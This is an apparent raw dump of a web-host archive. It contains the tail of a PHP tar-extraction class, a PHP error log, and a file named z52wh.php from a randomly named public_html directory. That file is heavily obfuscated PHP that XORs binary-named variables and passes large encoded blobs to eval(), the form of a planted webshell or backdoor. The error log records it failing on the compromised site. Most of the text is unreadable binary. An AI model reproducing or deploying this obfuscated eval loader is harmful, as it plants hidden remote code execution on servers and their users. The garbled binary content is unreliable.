$data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> error_log.tar.gz000064400000000547151032666610007701 0ustar00OK0w^ozXI7sUNc!#[&5 2* /< t{ӷQvm*ߵ Jn[S.GJJ"'0 \)-bN/[=ƕ?l4o 3 gX-V$Xh/w7qxƫ Nu7z Àm'Ep>uC6d/[*L/58o8,XǙ]]р%v*UFCh x/-8E2i9B^T Ō3j)9Z$-&qipxbwd.zip000064400000301237151032666610006601 0ustar00PKf[/ error_lognu[[05-Nov-2025 04:52:32 UTC] PHP Warning: gzinflate(): data error in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 29 [05-Nov-2025 04:52:32 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _͐��() in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php:48 Stack trace: #0 {main} thrown in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 48 [05-Nov-2025 07:50:56 UTC] PHP Warning: gzinflate(): data error in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 29 [05-Nov-2025 07:50:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _͐��() in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php:48 Stack trace: #0 {main} thrown in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 48 PKf[akog~g~ z52wh.phpnu[���ij|����Al����c�R�B�K�m \"e �M{B�乷-}���!��bqj�|liq�� 4�&&��p��y/J���ų۶|[�eG{�kk�G2J�6��O�����2�b��j�m�7��c��NM�6Yc�P_���ɼ�P�am���hA�֐�u��<����&�T�~,m��]v�G��TeM6�Ԕ����6�7糧y�k�{�h�8�n0���kU��z���T5�9��6GU8�:�hr:����i��|X�����c�.]��)�s�eeRWԯ��ߛ�쒂���P�?k��wqX�Ӗ�}�d�t[ぃ��y:�&Vu��aI��j��rB�AJ�� I��}��A�D!;E�� �C���ǂ.A4�I�0�� �q8:h�å(���X!%ƅ��B�Ń%i3:���j e=�X�^Y�B�'�ř�e�i��/@н�x��t�uh��� �t���2��wED�1�DAg��H\\8���IwI�!�(,�(�OL��Q 1 �k�§C>�?�� t� �p?�p���c4��,�Qu�@�wI�������v� ���քK�lM!/5M(@/ғ��T\\�Gv�;�"))xor${"a�����������٩�ߋ������������߽������������� ����τ��챉�۞������ϕ �� �掦����������ɰ���„������ ������֠���� ה������ʰ�� ����俌ľ��Ť������ͦ�����¹�˜�� ��������Ю�����ߍ��Ĺ�ΊΑ������Ø�ݶ�����������Ȫ�������Ɍ�����н����ؽ����ރ ���ې����ϸ����䃚�������������� ���ê�������������������������� ����ݶ�����������޽� ��������������Ʊ����������� �������و�����ޕ������� ���� � �㘀�ˠͣ喉����������������� ������������݌�� ��쨐�م˄��������������Թ���������뗝������ Ϭ���������Ä͙ �� �������С��܌�� կ���� �������ӯ� � ��������Ǖ��������������������������� �߷���íݿ���������ԛ���������ú �����Ȱ���ܮ�����͹����좒� ٙ�����ք �����ⓏŐ����Ҩ�� ������ ޭ������ 櫿������������� �����������˛��ݵ�� �������� �������Ϩ�"}=_͐��(" �ip�cDRP.")xor/*c�*/${"b�������ƥ�ܜ������Л���㆘������� ��ɴ�Ʈ�� Ɔ����� �����������ڀ������ʿ��ߛ��̬ ���������� ������ Ù����£ ������ ����������҇���㍖����񌟭�����Ч������ �ާ������ޑ�� ��������̷��ú���� �㈐������…�������������˜��󢾢�ǵ����ɭ���ʔ�������Ę�����������駗�������Ҳ�Ȣ�������������� ���������� ˮ��������� �����֛���߂���·�忾�� �����ο����� ��������� ��������ȃ����ˏ���򣧒ٳ����� ����������ɯ����������苣�������º���� ������ʕ������������ۮ��ص��Й�����ش�Ē�� �������Ź��������Ů���҇ ����������ز�ؑ������ν����������鉟 ����㼂�����΢�ɴݓ�ՍϿ�����������Ն ����� ���ʄ���ʕ����� �� �����ȝ�ԍ�Ã������ �ȃ������ �����˄�ʏ������׈����������������ݢ���������ҿ������̳�컹�����������������⺬��� �ɵߙ��ǟܠ��۽���ؐ�������������›�"}=_͐��("�8�ɾ7֡_")xor/*c�*/${"d�ǀ���ư��������� �ᥧ ��������������������DZ ����ͯ������������ǃ� �Ɇ�����ž�ݫ�� ������ �ͭ������ъ��˿�樋�뫾��������������ͯ���� ͒�˜�����ֱ��ϵ�����Ѽ��Ҡ�����Ҏ����ڐ������燶�����Й��ՠ�ݞ� �̇�ֶ  ��������澭� Ë�������� ��� ��������������⯴��� ²��ο�������������Ľ���ۅ�Ɖ���ζ�����侙ʻ�����ٝ���ۈ������� �ˀ�������Ŷ��섞�Ý�� ���̪М������Ĉ�� ��������۴���� ������ڭ�����ͺ� ������ŖՉ�������ֺ�� Ά꛻ �� ��ěԝ������ ���� ������ݼ��������嘙��������ּ����Ƀ��踟����ߐ����� ��������􄢳����К����� ������� �� ������� �����ш����蓚��� 땜��޻����������������������� �õ�� �� ����ު۹������ �딫ާ���� ��ǚ�۷إ��څ��꓋����ְ�� ሎ��街 ���Є�ɫ�� ��Ë���͸ ���꜡���͍�͋�������������ֱ�������� �nj�������������� ������ܺ����"}=_͐��("�;q���S3�")xor/*c�*/${"e������ ����ʿ� ��������ϓ��̺�������ɬ�����ΐ����ꜳ�ε�����Ţ�������ۃ����΢��͍�ʎ���Ş���������� �� �����ņ�����ɴ�͆��ֹ���������������쌕�����Ŷ��������䎫�������� ���ԗ�������͝�����ګ������������� ܖ����΍������������㦵������ ���� �ݜū�����ϝ���������Χ���������� ��֏�ә��� ���Ǎ���̳ �����Ⱥ����������� �⠽ ���� �����֢���������漾�Α�Ǻ�� 늍ֆ����В�����←����å꿛��Å��Ҹ�������ް�����������﷋מ꧔̕�� ���螞�÷ ���ʤ�����ʦ�Ɵ��Џ�� ���ȕ������������Ң�؍��������ͷ�汑���� �Ƒ҉�� �����������Ŗ�ծѮ���������֖�������ڨ�å�Ǿ��ȉ���Ŀ��������Ȁ������ᄋ��Ȥ� �ђ����ξ����� ���������Ԥ������ ����� ����駨�����������������ϕ������ ���������ㅁ��������ij ������������������ݣ������̜�ц۪�����մ�������ʬ����������↝����������Ӝ���܇��"}=_͐��("1j��FnIq���")xor/*c�*/${"f�� ����٢ѣ����������¬�����������ݜ����ˇҪ���� ���������ǖ��������������ꭧ����������ޖ��������� �玥�����ߏѠ�؞��� ����������ӡ�����ɫ��������ӝ���������������� ��� ���ك���� �К��������Íٳ����ح�������������習��遗ĕﭘ��ʋ �� ��е�����蠜�����ֻ���������⏝������Dz��ߪ���������������ɭ�����ݶ�����������쓂ᡩ� ����ޛ�Ȓ欛����׆��߄���ꅉ� ����� ���� ������� �������������у�������斲��غ������ۿ���Ŏ���ŵ�ϓ������꯴�ɱ����ȋ��Ë������ĭ��Ң����ϖ����˒����������������ŋ� ��� ���ֳ��������Փ��屵ԭ �˹��Պ���������� ��� ����ܶ�Ĵ������Ĕ�� ���̨����㝣������ẝ ��𔶦�����ԫ�����Ǫ�ƾÿ � �������ے���� ���ϐ� � ��������ݘ����������������� �ޒ����������ŤǦ��������ܕ������ܳ����ܧ�ܕ����҅�Ÿﶗ�����ԁ�乓�������ɉ������"}=_͐��(";�N�g�G�%��")xor/*c�*/${"g�̅��Ϧą���������ӕ� ������ڝ�����ڪ����А�͹�ݠ�́���������Ծ�� �������ǭ�����Է��̏���˫������Յ�ۅ����� �߶�����������佇�ڬ������׆�Р����� � �҂��������� �����ت� �ԅ���������� ����ҹ�������������׽����󋃘��Ϸ̻ꌌ�� ک���ޔ�� ޙ��ڮ�ʸ������ ���ןڎ������Ȃ�ӧ�ʽ�����ܸ�������������Һ����� ������ѿ������������������ ���ƣ��˻��� �à���ɝ���������� ���ٓ����򻄧��������� ��漕��܉���ν����������ȹ��������仡������������ՠ���� �Ë������ ����������������ŧ������׵�ɡ󏊜葂�ػ��� ���������������� ����������¡��ƁҊɦ�����������������Ǘ�������Ó������錍���Ҭ���� ����Ĕ��˵�� �ò����ڇ���������ܢ����Ѳ���������ե�� ����𫌋�������������􋐤����Ȩ�����䮵��ߩ�� �Ó���������� ˮ�� �����鼈����������꡸�������� 񖳞�����є�����Ǯ����½���������� ���"}=_͐��("E�x�^���h�ҿ�")xor/*c�*/${"0� ����끑�� �� ���τ��͋�����������В� ��������������ڥ톙�����᪺������ ���������Ղ��º��"}=_͐��("v\"�.@;�;h�")xor/*c�*/${"h���ܵ�������í���غ�Ȑ����Ƭ����������ü� ǔ���������Ո�Ν����ᵌ�� ������������ܮ������ց�������颈ˢ��ֈ�����ф���������������޾��������ڃ������א�������������������˖��ܶ�غ��Ǻ�൶���Ǝ������� ��� ���ۙ� ���������� �����������֌ԣ�ƒ�����э����ş�����۫����𔴳�������� �ʧ�ĸ�ն��������Ҙ��� ������������ ������Է�� �����������������������������瑒�������Ĝ�� ��Ǖ� � �� ���������ʦ�� �����������䥻���Ũ���ݘ������Ԧ���� �����ċ��𭂯���� ����븜ﵥ����ƤÂټ���� ����Ɛ��������󯗱���������������Ġ����� �������ǿѢ�紒�����������ڙ�����Ҟ�������⒣�����������ך�������ɼ���ʀ��� 됼��������� ��қ���������ǟ���������������������|�� ��Ǭ�ҏ���ރ��‡�� �� ����䠻�������������Ɇ�� � ����������˙�����ɫ�����̉����󸃘�������� ���ᅲ�����������"}=_͐��("� �n��B�!5[�A㣉�л�&�")xor/*c�*//*�c*/$�������=__COMPILER_HALT_OFFSET__ xor/*�c*/eval(_͐��("5�f�K�>�P+�� ]�G��K<(�.�6m[w����-�Ž��Q�%ϖ[N.����-�>���\"L\\�?�e��\"�6N|�.��)�5�R� CB��79s�x��mD�A�f�^�\"E/��Q7*x B�w�r�!���y��mh]Q�!�j���MR����V�Z �H>�<--��S2#P�c �?�a��GJ#�}x���@� ‹`ǜ�2c k���:��\"V���� �z��!�B��� �]u�Q?��j�櫸Z��轪�6j�H��� V��.z�>�*��g?��;�q���3qM ��+��Zwm`��C��ؼ �:�\"�Pp���>�35����}a�� �p7�&o.^�!>�,E��}�ލd���Y'/ŚKs�@2*r*.�k�S DBO�=�;��l��.(�VȌ���2DIƎ�� �r��Z�(M5���ˈ�F��Òn� �8�u�]�4������8�B �ԕ�j�M��!�ɢCb~+`���=�nM�����]�� �,5� ������>�&`�\"�B^��zw��C��W���}!�T+d�P͞�s����G�n�`����>��㇮}�W�Q�Ir� \\<`����d��+1m��#�n��*��I�d)�W�B}Cݷ���<���V���+Q���}�Ѓ��y��j�K��Cj�WWƈ�M��]��I�a-��砮�@��`b�@&U��h�_�!:��\\z�R���5:i�=|�;��W����87���* �v� �K�'k6�s��5� ��l�#�s[, �X�ܓ���;�FN��~t�a/׼���Kʩ`]�%�5���V�XiI� ns�SJ�2�N�_v3�� �f�f*�Ú�p�A������C��o�7�S��s9�jb�z�;�Qآ��(� #�����n��LP&���5��-�EE @~���iD{�kb�M�S����D��{�-Y� ����Id �y��Ȋ��� 5�-6��T�\"Y�b���bt��w-8���L��\$�/x�8#� �R��TL#\\c+�,�87XT�7h\"�&���:���XP7~\"S�r(_u�D���^���YjD�8*V2�W-d��r���{�O�U��q׶�h��fRu�Sp6�� ߸�b�񼒿b�'jG#t�53hh?6�����v6������` 3~>,Q�a _+�,�He�DF�)�_���\\\\ ��9վd5&��bs��Tk�Ӷ��ZG�4��Oi[4}�ֽ�0I6ԧ4u)��J��F�f�qb͚j��h���sm���k;�aoj�(WP,�VV�O1Z�]ԟ���E\"/�\" ��D]P�g�AH� s�r)��J��7��� ��*a�=+����8��}� �|��F��Hz�6��%5�#��+��d�8\$PCx�l�L<岖�Es� �E��m��0  ; �h�>�0h[Ee��`�x����-G�)!e����Os���%�����8:�ߧ@�,H<� �wa��T��Œ&���N�%�X����r'�iV�W�A '��d��V��Rx_/,r:�'�ײ3w� ��Cs�<�Y�.J~}t����������\\w#e�� �?i]��vn���Put.�� |�0/�!��b� ;@u��Fq�*�—'���ֲ��t�_IJ����}(�����<#�-\$;����Pb�S��y;4Q�95����xG\\Y�k7�P�(��i���.��ӵt��W�ڹ�-�[�\\�υH�Y�&B���B��� ��l��ڷ��O�P�E�{� q�5�:v�� ��ӥ�*��'�I*?/����l��I}��QCf��6�'W6�5��k��ܢ�G�>��'H�kh��@L���A-' ݣi�V-G�Tm�hH6H�\$� ���Y0��_G�*P�� ���#�ub���u���/[G��o����=;(mV�� 7��e�̭���14T�ɀ�-���T�*�M-y��eguw�y^��<9�a��ca�B)Ύ�Ƹ �M�oP�]�K������Tnh�b�|����x� R�y8���I՗�#)� ��w��ĈvL* hX�I��Oժj�U�d{�ț �%N�@� �MK%�C�n��Vwh��V��K�-د��q�i3��{:�U��z��#���8�́ѹ{�P�v�>\\�nx�O[{Jay��z7�Q�܁:���i��#j�M�V0�C����Y����A�'t�rF��ؒ���&O�ٱ�(D_���^��h1;\$�� �(��&���i�Z���|㶹��S��v�:Xn� �H����IG�d��FGBE�«�3K�g{�R���rN�k����i��h�\"�52�N����):S�7�� �7�!��h�FC�F1޳����F�5:��=�%�hN���П ��BZ�Q1���)r����P��V|�1f�1R� �����@,~I{ NW[�R���h ��K[w�yJ���ܰTw��۳;x�����n�2��WE[ж�:���rr������>C��(D)t�1�H��M�̱d`�����8����_t��j\\sN��_ma��.�e�~@���>�&x�,9��,�T�+�(��.JU���ֺty��>8VK-�I����/� �,p�U��yS�: �R�x3l�3���/�f��I��91��na�����4�,3��FT9z=�9��\"����h���*LMxe(|�:�g��z-�<4Ї���Ro�w�� ��5sDZ#ݻ��G\\� ��E��WN�h����.0��iB��ǭ���cI�<��2�[^��Ɯ�m!f��Ɲ�wK>�]�-C�!1���`ԝ}%�<�;�k�G�5�N�Bs��������W��#�m���-L\"g��}6n��F�j\"�4�����%4Z��y �y�󜏡 �:�j'���s�0D'.�o���۫��|��3�tli����+��oA��Mњt��4�<�laxܥ�l�kS0��37���OEm�f� ���8�\"!.���9.�M�Yc��i���o&��`�t���!�)�'B�^>���̣rQǜjцd�3��v�>9�(qÖ�� ��#@�t!��Y(53`5����ؔ�i�+��^�hCh{��pB���H���M 7�,K�q�o�b�%*d~�ω��h�q���q/z���Uu�����9o˹��RLg[E\\�W�;����#�ń���+��HD2�r�q1��`��No�1V�wq8��\\ LE,�#W |M����Y����=��'�� ���{�25���ɖ0��5� �PD{�e����2�{��.��TyX8�tzxMwDu&�(Af�!�𔐰����j�_��F���ʜ�Ջ-�*�5�1�d��1� ���u�߂� �):<���;eK�&\"&�32���W�25YU�H����x�ģ��\$��_�()��3\\�؞�QA��\"dHb\"����C�(��7�-K�n�9�,��[�O4&&�6�B�8�#>h:3Sc����Sh4~�~G ���E5C\" �!��BN��;�A ��qa ��)��*`����w^�����V���>��z�hH: �Zj)���*钴���v>� (vS���N��=�n�DE������d�!�B�Gr��l%~�Z�Lօ�?+�G�3�9>�]�+D�A�X��e�|\" �� N��j��J@'��5��i8{�� � �C���K��NICi�+-��vSڐ��l�O����>���.�]|� .v^��mrm��pb�?���e��~�cr�f �F�&<����!V�ص@��`}�A��e{mv�j���?bi��.�������h́�6S#���~v�9~5ܞ_��R�L�O���K���6�.\",�H�V�����E]fD��� ���9�C�p��;r�þU�#X�;�`��ƭ��0�u�1 �y���>&O��\\�w\\�{��a=M-!x75� � ك�P79���L�r��؄��9�*S�&a�ǞZ}ѩ\"_ 0ؙ�L�]� ����B67�1.��3K� �J�D��5���� ��.W]��G�e�(��<����#�7v ;�4(��?z�&C�H7�KZ��1�ؠ�����%�[-��of�ɽp8�:�\$��Em�|�h�J\\�Նl�ߖ� 0㼼�u%�Vޝ_�>�����@ub�Y3���:�.�A3,��!7~�.qd���UE5�@,}��:{�d�l� �SQB�U���k��7\\���b�F�wJ ���&:}��搚'��x���\"J����ڵ�Xϊ�d0�۔��rge�]���B�˧�� �k� 5�Z\"�Xm)��釈x%�����������- � 5B��ֺ� �G�������8��_N��YO.��鍲{M�����?ljg�o#�!�!P���ne�7h�-�C:s ��o�SB�ҋ�̙�^I�0��C�������{5z�:��ڼ������lj7��.�=ckZ�x�����^e�~����:�:Ɋjm�aKn��v�U9JX�B��G�>(�����:w b�;��N�p��m��\".+M#��S�?C�ݶ��g ��� }�+�O\$�kwr.Y�)d���\$�)ܷ�[��0Y4��0�O��'z(�X�}`g�CE�\$�CZc�δ��y= #�]��a� 0Y vz{,�ڎ-~E����쁤.}� x��zNx�M?�X�ԕ�\\�qj�A�)�g*Y��t�9^��ׅU�\\���!��R�(��U�,�5,�5����l9XM�b9��>�J*0����\\`/��b/Q� }��m�ƽ�h+����G�=�^ݫb�MIp��sTO� Ŷ-#��8�|��%v9깾��N� mG���k[ōÀ���i8��ޙ�+j���� 4�׍0�����w� Mqo���̓��h�o��w���_�ub�'��t4�Nf9����wu���&�ߕ`n�3 \"gt��n)�l�� '���~��C�؄�Ц���G��4�c-��,���Z j�C,��j:^�mw巅�G���}X�˶�C��3#6 � ����hWr�QZ�?< ���N�� Nx��1�'���H`G�j;�V�4Ԅ�|}/auN��ڍ:��aG{8p wMx��Z�&�#��9t]�^Ċ�p��0< �)U��n�K�{G�b �~����D�i��>�anSK9bn��� 5oE�/����t洦{ &Db胬��R�� T��NI�‡򖪰�5; o�~�F����\$� �gw�`\"06���� /�����y�)I ���7[%OUsV�����{��y�x��ܬ(|�� 5˶#���(8ΌdC����0j��!t���I�*_ݯ;MP��M�� ��s�j�e�A� 7��c��E�7J6�Q�'��-[b��1���\\�'B�ǽy �2ž6��v��2U��~B2q�B�\$d����S�R���.��9�Jɨ߮\"�b�����X��m>�/����d��0�EG���@���� QV���ľ�O��_��{�.��ו�GK���8pH;k���l��\\Ca��Ij�?c��<�Xm��J��t񃞈u`�~�-��?�ͬ��؋lT�cVi<)�F�b��� � � w����o�@���� � �\"����X�8/�'5���G*1�Zu�K�� ߭l�� �h�/d���ec?�:�„“�vm3w�,<��}�i [hR�R�S��%�\"p��jC�!���)Z����^�J�|dQsR�u��o�\"�T���vn�>��y����kx�V�ή�z��c�/��؉O+���B_�JWa� R��UQ�Е�����j\"9���~���Wa���X�KW���5I�gy��O�WT��!Y��|aB���rI��c9����֚×���2Ť/&Fp뎳���h�=,17G���Fkg;]B`7�d�G���� ��ӄ��ꎝX �Cjz@K�p �?�ʱͯ���s 6��?�O~OW��ݤ 9_]Y�O���h�(��v�� � �O���T��K����l3����h]9���Ց��;X�״A#�j{�>`�S}I�� YX�0'�8hq�d�J�X�]M�~����p�(���/��o�+�){�Y�1c�)tt�]!4[��i�_K�m�i^36Y��Z��FHÔ�^��p�d��N?ԙ\"��ޫ��/n�JT�/&O@������2ϻE���Ɇ�����r����� {��K�U�V�<��k�u6��Д{b�k-��Lm9Y;(��uSF|I�l����*������Fj8S���[.�������R�>8���\"pߧP�WF2a���h����l�<��M�id�%�B *�K! W&ca_�< ��D`8��'2;)&h�R,nZ��v{@���kJ/���d.��?}�:�ND��\"�lN-�9W�*F:F0u���]�B�m��Y��F�^a������)���L �8�l��4����M�C�H�� }ĠA�)qF:n�U���-��!Vv��R�U����J2��M��@W��WQ�N����,����Q�櫅.����#ᑪu5�@�+㘽��}��d���v�͹P���K-�N�X�3��r?ߏW���;�����*/��g���*h�I]q7��-���O���D"))xor/*�c*/eval(_͐��("�S�\"��\\�w�Il� ���Jz�� �Fٷu�(��^}��h�9cN�� ��6��U ޻�U��H��f����SϹ �xij�����~H!�S����*�\$J�9���28X��c� � �~/E ��I��5x_��5;��?�{��\"Vz�\$_�7D� �k�1��Ycf����f�޷�f�KL(qo���+���zE߅�[�ܷ��Z�:�c���;�@�WV3U�/�L���K�*>��VY�Ҽ���#|+Y!�(�� N7W��<�!��nsͽu��%��)�}2Ȁ+�v5&w�lѤ�0�}L,��m���4`&�U͠��C\$T`��Ƹv �}�k��fX*�����텹'�v� �y^V ����&��]�򣙢[��vx,(G{K:�Ȓ�mX7�.\$!�q!����*p�:��L��50� E���U!���V��SK��N��FvV0rjY>�`8�d��UKJ�j.����,�Ř�u�9\\�����H�.�̕��1/S^@=�5��ǩ��D��7��C�� O��V����Sh��W���@��d�)`�x�i�Ȓ YPa������ед� �\$�z;�=�^��[~�z� ��J��p�~o�m�� ��N\",}��qi �6q�^���uȯNB2�0T�V#���V)}��)�������xs�t��.�1K+H�Zv�䛫��#�9G�*��g��R��0�+3��H�Up �s�<�c�y&-�*�� n !��f��ma���B´+hi% �!�J�}�����4��}�P���UR���1U\\��^��R��f��kf.R�������Zc�4~R�;��k,gl�5��)9MX���Q�Kg�y�X2��Y��! �\$�}uk蓥��F� &��A�-�Y� ��B�X�L! d-/��hG�7�km��*G^��!�2�Z~N`4Ly^�Y ��p{Qk�^k�G�,.�#A���Q't��7V+�Ք��PxoZC{O��Η|��oqa��jba��o�\"��~o�r��!sz�\"�U�Gr�c��~ծ������Q��>V^��e�}m���`r�\\��5�gy��w��� >��Zo[�cKe��ZC-�)�1+&a�*�'.g�O�S��2Z^�?�t�08�t˒=�����9+V��~rHGI����K��5JH�|�Eq��xv&��h3���Ҁ���9�h�c��8�C����K�DZd!��G-K�U��!�Y�>� ��!�,� �]޵p{G���BjA�:��|���n� ?FdJl�}�M�TO6<h�=��7SkS�� �ӫ�W�ھ�h�bF�� Qf���l� �԰�=�l���ӝO����U�f�d ج7�G��?�0z��5\"��Dy�%K���6Hk�K���h���Y�fS�1�e �^`�����tN1���↯[��Pe8��ݗ�f�m��Y�A� �����Ƈb͌�Si'�;��bi�(��b�ݯ��,y��9'&���8��X��O�[rB����Ȑ+b�H��x�!) �3g\"'��I�4�Z/>�E m43ɳ.\\�b\",�ݔ���S~GU�DZ=��u��J�Y��|s�2���#�p!�!\\I[TN���JF.�v�l���3��Sw�6t� ���|P�e��� �P�7�/�d���)�jw�3�MJ��\$��#�E����N��]��-=r����Á(e/��ȥ�e9�a6K�����.W |���P��q�3X-�V�p�@d k 棍��D�U�~������7����w�5%\"Td�Ƣ9�v�P� a���om��t���P�L{�j�ū� �h;K��ǍG�y\$*-���Q�d�#��-�H�)α�,G,�q�a�zWX����C�4�׽�r@ u�%iզ�� �_U��V Kce�3㯍�` #?OҚ���������/��ݥoxF�[J�w�� P�<��]�B���MYZ4��Z����Aw�?Q_��s��&���/�8WR=�g��5j��Wa2��*�� ��x�6�?���u[5ʾ3�}��{�p� �ۢ�1�]�O u��Bܨ( X ���X��ya�f���o�vW�\$,q.�Z���Z�[��&P^��<�P�g��a����m�_��jA����2��E�d�-\$����ľ��F�[��55У��Xhy���X� ���j�MAq[*m�i�A�Fz�=s� �ͪ�=�b=�7.֌~ )�@��BpdN9��pK��SHYtx+��j��Y\"1��V�:*���?7zD�@�C��}�djym-��XW_�{�k;��ޏ�{��]��M�P�d&B[�,Eh#��� EK��vV��}�(�� L�>�܏��+���K �n��� (��mb\\I�ƃe8p��r?��w���{��n�t�_H�(*^ѐ�& �Yh8 '>�����6,):u�MĶ��Q�o���*S�a5E)Q�#�w�����2�yZc��l�|�נɚhxS�-3D��3]ϙT �.gӠ�`>/r��H^!ae�\"�Ud`�V(�q13��/�%�?�|8ܛӃ��G^)�1GD���5ۛy�`xu[�Ǧb�}���ڌ�;.K��Kg<� E���936��t�R�8�ؐ���*5�p��Y#S�ez��S3&*�Evf�T�\\��WF��O���r�/��T�,8Jim�y���i�*������)2��n#�����[̵�S0S��~sϒ�v`k�vP�X�>�(���!�̢Ѳ��Z�������I���,nk��w�BD'�� �6:�gy���̜Bz}a�������jy?�p��#XI(�s� �� ���;2�M���]�f��(xo�0�P70���Sdd�� ��?��d 6ؑ�������BU����D!t�����'����號\$DR^C�*E���,�wS1�fL��uGX_��\$�y�;���;��X��g�� |o�]�T�G����K��\$��ՋТ�P��<Ƹջ�2��d����=ٚ'G�� ���/�� 8��a4Y�_PJ�m<>\" <=/�1B� =!EP֡6+C�r�U\"� h�6��#EҸ�̢��% ��7\"����:�b�G:慪�.�R>���S�CVp�0FJR�@~�5y� T����#j��r}��}�%�+��a�F\$�k d��+ A �3�4��,��D� �1a\\.�fᏘ����.y�9^������վx^�'�+�W��*�G��ʥs�Hv�ѡ��c��hurw��`����]��\$��]�I��ByV� r�_�2�v�OӦ�}��d�xB�{ؒ��[ ��S`�럘�oW��a\$�,*7p�-fDa�ꄹ=Ł L*�Ϳ�S��W����5h�P�6�k�ƎZoӪ�j#H�32*�����8F�<��p�I�c\\���Fi����v����z��{k��4Sl�# �<(sxLNm�1(���@���Ύ�=]U ��R�S�(Œ2��+4�9j���O�lgb8 Yw�&R)����=�˞H�0X��'��Х���HE�\"�[�+4��Qk���jN1q�J�[��C�3����;���7���I%G}��|f�`��6A�?#��ښ5��]�vj�F��gK-&5�ef;�ީ�3�fu��'C�.�#��*I�8�M4~��(���Z6�@�~���.��@��}l>�l���K\$WH���?�.@�4��_H�#J�.\\Nj�B����� \$�|U�a�Z���m�� |D����@�-h V��^�j@��\\�Lx�}�2{c�,U�?S��7��Lv��J�_5���#�ZUҚ,�*�Q���~��H4>�ڝ�6����}dD��5F�g�۩��d�6�i%���/�-�Ϡׅ�#�� ��bg���(��A�~\\�N��U����#�/��v��O�]��B�t���b�^?7G�~'���,-?G��2�)-�)|���`\"\"/����~��@�L����x��}w�b(^\$ƞ�+��F[za_����r8���V[�gL�K�� '������0��H�7�Tޮ-�ѝuܹ� ���8Af�b\\i㦍LN)l���VЂ7�Ԏf��{jq�\"(��v�|Y�:n�+N�E N�*�eUr� B�m�{>�a�|Z�6 !>���Y]��ml����h�� ~�1 Օ�yWR�N,sl�<��1��B�� ���,t����1�,�8=B���'MPQC@F���\$%�ؙ�!�y} 7(pe�?��-�NS�O��>��@��VwfӎK�� �dy��w %��A6߼H\" &�ܲ�~�������S�˂#��h/����8(����/�ݔ��b��e;���းv:�&�x|���.��;!!�\"ΏN � �꠽�z �E@���6JFy~�a��/������v�Hb2�=��L��k���; T�\$���@�t����.��� h+d�j8�� �:v|=ůo�H�X�X��h�8P���@#����A�܅���} �6�3F�#jI�v?��Q�D�uJ�z´�ga2�(�9Z1Ϝdh�]��i��Y���p!�`��H���AQ7X,v��1[�� oN \$ H����s����� �N�Sh\\lQz+�.�Ɤ�LZo�ŵ��[��DM浡�X�;ͅ�����e4���s�9elӔ�j������3���>v�˵�������Cr�h�Q N#G��ya?�?&���G��m����aG�uO ��/E}<&S)8ۊ��v�,��U�A�o1��y\"%�9>\"lL ���D����PqO�fܚ�dп�����X���d�%�Ue3j���Ol� ����]j��;�i/�Kq�(��2��(�u��8��E����\$��|#��28ۨ;����Ӷ��!t5yIw��S@\$�]�}�]�pM�1�o���se��%�D��>��B-b���b��{�L����@�z�{�_;9�\$4e�����q�6�Q\"��K�#��A�{*Ɏ0�����*Mj�4�^^�A~��t�n���SڇfL7��r1綩��)D�:T{9U��w��Y2�t���!r��;�~�/ȩD2���Sv��+g8<��<~��D'ІV��z��*�_���E�6��~ݰ�va0�B ���� J��u�r�R&������Z �늆�끍�� 7 �uF�<�j~>�J��%��Ֆ�;���n�O }���暴���c����FQ21]����\\�_�̏�S�� ̦IU��-�ۣk<u�N���,u���^�ǭG�it���H�t*�R��f\\�fpo�<�_[@/��߲c��5��B�H&6iZ�Yu�,c�K*@ݒ(»u����\\��VEX ��\\��(WE' gG�Ds\\v����o����b���}F!��T`}����n�j��`�_mt7�D�2h��bTDTo)jÞ0�\"� �l�x!�Q3���,�_�G�h��ls�Ǟ*pKܳ����fy7���_����1._�w�f�e��S�znKq�� ��R�1+�|L�-��|Ai�m;5L�W�s�V��q�JO� �b(����*R��f��r�?86��N�w^N������(�F�p�Vң�o�x���Z�Y� w�@�8VX�Ѥ;7�,z����耲�,��j�����ek8���I�u:�b��۹\\*Ht��+]�N�I\$X�7�KG���i��m��4 �wF�;ayhT���G�h�������^S�l���NN)�F7�˗ON��M�_���D`��i�v%c�O8�HI%�H�jH�L���z�rӭΤ<ۍ�\\�G��\$�Sp �h�L� mloQ�R^����ȼ�x�xh���z�S@��u��fp�xqH��������|\\�9�|���÷_ 2��b��x��w��F s��bk �l�m*��/�>��@��3cO\$�ٌ:�@� tDN�V�9�ɍ\$�?�o��_��S��f��F�p]]��K��b9�| �ڌ�R��=��kɇw�X�,-�Ƹ����O� �%c��A�����^e��LoUvB��ʼ;���~����0�̪�Rhr�FV�~�.�I2sm\\P��Ϡh ������M����3 w�(�`��\"��J�^{qӴ�0+r��h����rAs�7�%���� �l@@�t�f[���� ���Ln�{od�I�g��bt���r4�% g m�5�q90�NTl���T���p3�1�h-����ާ{ �԰�+���vZ�M���BY�>�jb��\\~�zd��C����a(\$�}^4�y!;�8䏻�چ��6.�y���Oz���_���V���=��D�C�&�06H�Z� ��K�� }r9�l�7�#�/�ި�a����Unj� ���WQ/�����x�۟RM%�,9�!D�ê�l!k��f�Z�*_�:i��uDrB��@��9��/�wA 0e��v�]�(�|8 L���`n�™j �7�Rx\"tWK��P�v6&�G�*�\\1���J6�E�fQ# �:slt�k+ r.zft���1���=X ����ǹ��,#m����đ�_0�bB���v����{,s~��{��q2��q����8��e��r�q��)xE΁XF�F?�iw�kK �y�g1�&6��{_|�fV1_Y3����3 �F�C�2dYSVG\"�`��E�A0|M. ��ǒ��+�h�2�[\"Z����>�P�\\������j�SѢ�:�g��4����� 